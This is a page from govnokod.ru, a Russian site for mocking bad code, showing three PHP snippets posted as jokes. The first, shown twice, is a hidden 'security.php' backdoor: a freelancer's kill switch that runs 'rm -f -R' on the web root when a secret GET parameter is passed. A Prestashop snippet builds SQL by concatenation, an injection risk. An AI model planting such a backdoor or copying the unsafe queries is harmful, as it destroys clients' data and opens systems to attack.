- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
<?php
$param = $_GET['delaem'];
if($param=='nahui')
{
$dir = __DIR__;
shell_exec("rm -f -R ".$_SERVER['DOCUMENT_ROOT']);
}
?>
Нашли или выдавили из себя код, который нельзя назвать нормальным, на который без улыбки не взглянешь? Не торопитесь его удалять или рефакторить, — запостите его на говнокод.ру, посмеёмся вместе!
Всего: 3
+136
<?php
$param = $_GET['delaem'];
if($param=='nahui')
{
$dir = __DIR__;
shell_exec("rm -f -R ".$_SERVER['DOCUMENT_ROOT']);
}
?>
Фрилансер защищает себя от неплатежеспособного заказчика xD
Файл лежал на продакшин сервере около года, название файла - security.php
+163
$textb = Db::getInstance()->ExecuteS("SELECT * FROM "._DB_PREFIX_."productotzyv WHERE `id_product` = ".$idProduct);
$count_otz = count($textb);
if ($p==0) $p = 1;
$limit = 99;
$texta = get("SELECT *, date_format(data, '%d.%m.%Y') as data_ FROM "._DB_PREFIX_."productotzyv WHERE `id_product` = ".$idProduct." LIMIT ".$limit);
$ed = count(Db::getInstance()->ExecuteS("SELECT * FROM "._DB_PREFIX_."productotzyv WHERE `id_product`=".intval($_GET['id_product'])." and `rating`=1"));
$dva = count(Db::getInstance()->ExecuteS("SELECT * FROM "._DB_PREFIX_."productotzyv WHERE `id_product`=".intval($_GET['id_product'])." and `rating`=2"));
$tri = count(Db::getInstance()->ExecuteS("SELECT * FROM "._DB_PREFIX_."productotzyv WHERE `id_product`=".intval($_GET['id_product'])." and `rating`=3"));
$four = count(Db::getInstance()->ExecuteS("SELECT * FROM "._DB_PREFIX_."productotzyv WHERE `id_product`=".intval($_GET['id_product'])." and `rating`=4"));
$five = count(Db::getInstance()->ExecuteS("SELECT * FROM "._DB_PREFIX_."productotzyv WHERE `id_product`=".intval($_GET['id_product'])." and `rating`=5"));
$uri = $_SERVER['REQUEST_URI'];
$i = strrpos($uri, "/");
$uri1 = substr($uri, 0, $i);
$i = strrpos($uri1, "/");
$uri = substr($uri1, 0, $i);
$uri = $uri."/";
$monUrl = "http://".$_SERVER['HTTP_HOST'].$uri;
foreach ($textb as $s => $a){
$text += $a['rating'];
}
$smarty->assign('ed', $ed);
$smarty->assign('dva', $dva);
$smarty->assign('tri', $tri);
$smarty->assign('four', $four);
$smarty->assign('five', $five);
$smarty->assign('ed_proc', $ed/$count_otz*100);
$smarty->assign('dva_proc', $dva/$count_otz*100);
$smarty->assign('tri_proc', $tri/$count_otz*100);
$smarty->assign('four_proc', $four/$count_otz*100);
$smarty->assign('five_proc', $five/$count_otz*100);
$smarty->assign('rating2', round($text/$count_otz, 0));
$smarty->assign('countotz', $count_otz.' '.endingsForm($count_otz,"отзыв","отзыва","отзывов"));
$smarty->assign('monUrl',$monUrl);
$smarty->assign('text',$texta);
Prestashop, реализация отображения отзывов и рейтига товара
+158
function get($sel, $od='', $show_error=1)
{
global $__DB_CONN;
$select=$sel;
//echo $select.'<br>';
if($od=="")
{
$res=sql_execute($select, $show_error);
if(!$res)
return array();
$mc_runtime=get_magic_quotes_runtime();
set_magic_quotes_runtime(0);
$mas=array();
while($v=@mysql_fetch_assoc($res))
array_push($mas, $v);
set_magic_quotes_runtime($mc_runtime);
return $mas;
}
... //тоже самое еще пару раз
if($od=="by id")
{
$res=sql_execute($select, $show_error);
if(!$res)
return array();
$mc_runtime=get_magic_quotes_runtime();
set_magic_quotes_runtime(0);
$mas=array();
while($v=mysql_fetch_assoc($res))
$mas[$v["id"]]=$v;
set_magic_quotes_runtime($mc_runtime);
return $mas;
}
if($od=="ins")
{
$res=sql_execute($select, $show_error);
return mysql_insert_id($__DB_CONN);
}
return;
}
function get2($sel, $od='', $show_error=1)
{
global $__DB_CONN2;
$select=$sel;
//echo $select.'<br>';
if($od=="")
{
$res=sql_execute2($select, $show_error);
if(!$res)
return array();
$mc_runtime=get_magic_quotes_runtime();
set_magic_quotes_runtime(0);
$mas=array();
while($v=@mysql_fetch_assoc($res)) {
foreach($v as $ii=>$vv)
$v[$ii] = iconv('windows-1251','utf-8' ,$vv);
array_push($mas,$v);
}
set_magic_quotes_runtime($mc_runtime);
return $mas;
}
... //тоже самое еще пару раз
if($od=="ins")
{
$res=sql_execute2($select, $show_error);
return mysql_insert_id($__DB_CONN2);
}
return;
}
Функции для работы с бд!